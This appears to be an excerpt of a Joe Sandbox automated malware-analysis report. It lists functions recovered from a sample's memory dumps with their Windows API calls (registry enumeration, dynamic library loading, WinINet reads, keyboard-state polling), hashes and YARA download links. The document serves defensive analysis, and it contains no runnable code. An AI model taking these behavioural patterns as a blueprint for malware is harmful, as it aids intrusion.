Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0

_free.LIBCMT ref: 0054BD4B

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 017de7a3d97c3c82398593e4bc13c1b7bb4e02e70dfa46924d1dc0338f07028f
Instruction ID: 6458ec65f0ef44d81316055b1b86e12903526851099121acaf2fa9c6b05f6472
Opcode Fuzzy Hash: 017de7a3d97c3c82398593e4bc13c1b7bb4e02e70dfa46924d1dc0338f07028f
Instruction Fuzzy Hash: D951E47190020AABEB14EF669CC59EEBFB8FB90318B10066AE554D7291EB30DE459B50

Function 0057E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0057DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0057CF22,?), ref: 0057DDFD

Part of subcall function 0057DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0057CF22,?), ref: 0057DE16

Part of subcall function 0057E199: GetFileAttributesW.KERNEL32(?,0057CF95), ref: 0057E19A

lstrcmpiW.KERNEL32(?,?), ref: 0057E473
MoveFileW.KERNEL32(?,?), ref: 0057E4AC
_wcslen.LIBCMT ref: 0057E5EB
_wcslen.LIBCMT ref: 0057E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0057E650

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 1ca2ea8168c41e3a96d73ee7f9078b7d37f065beb2141432717f693e3f3fbaa5
Instruction ID: f7b32ffa0406c7e72e17dbb538541a1960531860fa7a35bfe44debbd196d8cad
Opcode Fuzzy Hash: 1ca2ea8168c41e3a96d73ee7f9078b7d37f065beb2141432717f693e3f3fbaa5
Instruction Fuzzy Hash: 125192B24083455BC724DB90E8969DF7BECBFC8340F00492EF689D3151EF75A6889766

Function 0059B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD

Part of subcall function 0059C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059B6AE,?,?), ref: 0059C9B5
Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059C9F1
Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA68
Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0059BB63
RegCloseKey.ADVAPI32(?,?), ref: 0059BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0059BBB3

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: ab358ccb64121e4d00b320407a521ea787e4b4bf072dc6102dfda4396054a205
Instruction ID: cdc935dd82569dc0e844e059fad9d4eec726ddd56382caa8f3be6678c7951da6
Opcode Fuzzy Hash: ab358ccb64121e4d00b320407a521ea787e4b4bf072dc6102dfda4396054a205
Instruction Fuzzy Hash: 8661B031208241AFE714DF24C594E6ABFE5FF84308F14895CF49A8B2A2DB31ED45CB92

Function 00578BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00578BCD
VariantClear.OLEAUT32 ref: 00578C3E
VariantClear.OLEAUT32 ref: 00578C9D
VariantClear.OLEAUT32(?), ref: 00578D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00578D3B

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 281ad127c6f5b488f41dd9095753c0cfa24943926c3d3f92b3153a99f55794ce
Instruction ID: 7c80970e1213464221eb4496de8c75ebeb80294f245bfc2cd8b3f89fe0b275e7
Opcode Fuzzy Hash: 281ad127c6f5b488f41dd9095753c0cfa24943926c3d3f92b3153a99f55794ce
Instruction Fuzzy Hash: 415159B5A00219EFCB14CF68D894AAABBF8FF8D310B158559E909DB350E730E911CF90

Function 00588AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00588BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00588BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00588C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00588C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00588C5F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 87179ad2596f35eb8dcdeeee76adf1c38219a675df665b1847acd0d0e42de642
Instruction ID: a19e350f6f286658c5e9b15f55307042e586999b4f5f3ad6ce430dbebeefcec4
Opcode Fuzzy Hash: 87179ad2596f35eb8dcdeeee76adf1c38219a675df665b1847acd0d0e42de642
Instruction Fuzzy Hash: 3D514C35A002199FDB05EF64C885AA9BFF5FF89314F098458E849AB362DB31ED51CB90

Function 00598EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00598F40
GetProcAddress.KERNEL32(00000000,?), ref: 00598FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00598FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00599032
FreeLibrary.KERNEL32(00000000), ref: 00599052

Part of subcall function 0052F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00581043,?,7529E610), ref: 0052F6E6
Part of subcall function 0052F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0056FA64,00000000,00000000,?,?,00581043,?,7529E610,?,0056FA64), ref: 0052F70D

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 30bd0609d7893bdcba96d7795368c2ecc48da038254d8f637e30759a0fe88f98
Instruction ID: fbbef9e352b1613c8fa91f9117b92fae8a2c555a3f6b240144b2c7ccdc133f01
Opcode Fuzzy Hash: 30bd0609d7893bdcba96d7795368c2ecc48da038254d8f637e30759a0fe88f98
Instruction Fuzzy Hash: F9511735600205DFDB11DF58C4988A9BFF1FF8A314F0980A8E81A9B362DB31ED85CB90

Function 005A6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 005A6C33
SetWindowLongW.USER32(?,000000EC,?), ref: 005A6C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 005A6C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0058AB79,00000000,00000000), ref: 005A6C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 005A6CC7

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 0e697621d9952cc67840213a7c0c9299afe9c12277914fe7d495b2076fc54496
Instruction ID: 3b39315b6169eefebab93b79cc03f7a843ee7e4f72620e3c0e304cce5329afcd
Opcode Fuzzy Hash: 0e697621d9952cc67840213a7c0c9299afe9c12277914fe7d495b2076fc54496
Instruction Fuzzy Hash: CF418035A04104AFD724DF28CC68BAD7FA5FB0B360F190268F995AB2A1C771AD41DA50

Function 00542051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 005420C3
_free.LIBCMT ref: 005420E3

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 40dac34452c29d3d285367ec9e7711878103222d4d833ecea8f4a32398d386d7
Instruction ID: 183b748e96f74ac567f286ee50b1371f51938626959f1d6d97846b07228f91e5
Opcode Fuzzy Hash: 40dac34452c29d3d285367ec9e7711878103222d4d833ecea8f4a32398d386d7
Instruction Fuzzy Hash: 5E41E432A002109FCB24DF78C884A9EBBF5FF89318F554569F515EB396D631AD01DB80

Function 0052912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00529141
ScreenToClient.USER32(00000000,?), ref: 0052915E
GetAsyncKeyState.USER32(00000001), ref: 00529183
GetAsyncKeyState.USER32(00000002), ref: 0052919D

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 9265c970efff0707028236a189c98b5f60c89f4a6111d25c2623092567dad064
Instruction ID: 9d2a1fbd3cd9d4703fec7a0be231ebe00589e17911c06a0eb440ed85d9f8d19a
Opcode Fuzzy Hash: 9265c970efff0707028236a189c98b5f60c89f4a6111d25c2623092567dad064
Instruction Fuzzy Hash: 1D415F7190861BBBDF159F69D848BEEBB74FF4A324F20421AE425A32D0C7305D54DB91

Function 00583874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 005838CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00583922
TranslateMessage.USER32(?), ref: 0058394B
DispatchMessageW.USER32(?), ref: 00583955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00583966

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 4503aef7a4387d5955e546e11e77a2924c56c79e8e0bc290dd450717327f6e5b
Instruction ID: 4f7c704a049fd1d16365d79e5dc282e96174174b464351dbbf9ba9575ee632fa
Opcode Fuzzy Hash: 4503aef7a4387d5955e546e11e77a2924c56c79e8e0bc290dd450717327f6e5b
Instruction Fuzzy Hash: 5931EB709057819EEB39EF34D849BB63FA8FB15700F04056DECA6E60A0E7F49689DB11

Function 0058CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0058C21E,00000000), ref: 0058CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0058CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0058C21E,00000000), ref: 0058CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0058C21E,00000000), ref: 0058CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0058C21E,00000000), ref: 0058CFF2

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: cd7a6e7c983613b9baafcb138b53a459a5673fa5fc532f949d85694e21ad5de5
Instruction ID: 8ef22b1384aa3925981837eb9b4bbcd1e2dfa31eb94be813000d1238b4842efa
Opcode Fuzzy Hash: cd7a6e7c983613b9baafcb138b53a459a5673fa5fc532f949d85694e21ad5de5
Instruction Fuzzy Hash: 55314C71604205AFEB20EFA5D884AABBFF9FF15354B10442EFA06E2141DB30AE44DB70

Function 00571901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00571915
PostMessageW.USER32(00000001,00000201,00000001), ref: 005719C1
Sleep.KERNEL32(00000000,?,?,?), ref: 005719C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 005719DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 005719E2

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 4690d1f04d452f7130f5e8eda3d6dce698ed176c45c72cb382b4a5dfd1410890
Instruction ID: 3486ec42c9f545e93dc0979e5a5cae22f7656c2c3d0fa965b371baba725cc6ab
Opcode Fuzzy Hash: 4690d1f04d452f7130f5e8eda3d6dce698ed176c45c72cb382b4a5dfd1410890
Instruction Fuzzy Hash: 1A31CD71A00219EFCB00CFACD998ADE3FB5FB55314F108229FA25AB2D0C7709945EB90

Function 005A5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 005A5745
SendMessageW.USER32(?,00001074,?,00000001), ref: 005A579D
_wcslen.LIBCMT ref: 005A57AF
_wcslen.LIBCMT ref: 005A57BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 005A5816

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 56df450c6b26b099d33aa84421eb53186bcf6070b79e5e17adef38816cd82d0d
Instruction ID: a4284232c3d5620534d9205d8c27ffa105127e8976dad31e93bdc0d7ede0f324
Opcode Fuzzy Hash: 56df450c6b26b099d33aa84421eb53186bcf6070b79e5e17adef38816cd82d0d
Instruction Fuzzy Hash: EF219331904618DADB208F64DC84EEE7FB8FF56320F108616F919EB180E7709985CF50

Function 00590930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00590951
GetForegroundWindow.USER32 ref: 00590968
GetDC.USER32(00000000), ref: 005909A4
GetPixel.GDI32(00000000,?,00000003), ref: 005909B0
ReleaseDC.USER32(00000000,00000003), ref: 005909E8

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 04ef9c01de7544c68aa15d2e3ad33063e8de2b277dcde7cc869954cf848ff025
Instruction ID: 5b628a112ce0d0d5a01c5e1db127711a9e8f6c3e44d1a8b7dd4bb2a884670cdb
Opcode Fuzzy Hash: 04ef9c01de7544c68aa15d2e3ad33063e8de2b277dcde7cc869954cf848ff025
Instruction Fuzzy Hash: 8C218435600204AFEB04EF69C949AAEBFF9FF85700F048468E84AA7352DB30EC44DB50

Function 0054CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0054CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0054CDE9

Part of subcall function 00543820: RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0054CE0F
_free.LIBCMT ref: 0054CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0054CE31

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 7959bd8c376b5cce12c976a6576b44b613f91bd1c97f61c912111dcd1c1dd492
Instruction ID: ff3b122b98d15f41fd89ee0a481dabfdb451f0f5dca1c607a42411067adcf822
Opcode Fuzzy Hash: 7959bd8c376b5cce12c976a6576b44b613f91bd1c97f61c912111dcd1c1dd492
Instruction Fuzzy Hash: 3E0184726032157F276216B66C8CDBB7D6DFEC7BA93150129F905C7201EF618D1291B0

Function 00529639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00529693
SelectObject.GDI32(?,00000000), ref: 005296A2
BeginPath.GDI32(?), ref: 005296B9
SelectObject.GDI32(?,00000000), ref: 005296E2

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 700be6cb469864f891a56b2127dd2869d07d1816ded742b45bc34b87be9aa036
Instruction ID: 9deb3f3eb4187ff1688620d40598047957678a1737c4e9376a05da9ae058af06
Opcode Fuzzy Hash: 700be6cb469864f891a56b2127dd2869d07d1816ded742b45bc34b87be9aa036
Instruction Fuzzy Hash: 7D21B331901759EBDB118F64EC48BAD3FA4BF22315F100215F450DA2F1D3706889EF98

Function 00575711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00575726
_memcmp.LIBVCRUNTIME ref: 00575744
_memcmp.LIBVCRUNTIME ref: 00575757
_memcmp.LIBVCRUNTIME ref: 0057576F
_memcmp.LIBVCRUNTIME ref: 00575787

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: c18d710ded64dc96bc542cf3b5c065ebfa722cd7cb7082d48ba48316ec425213
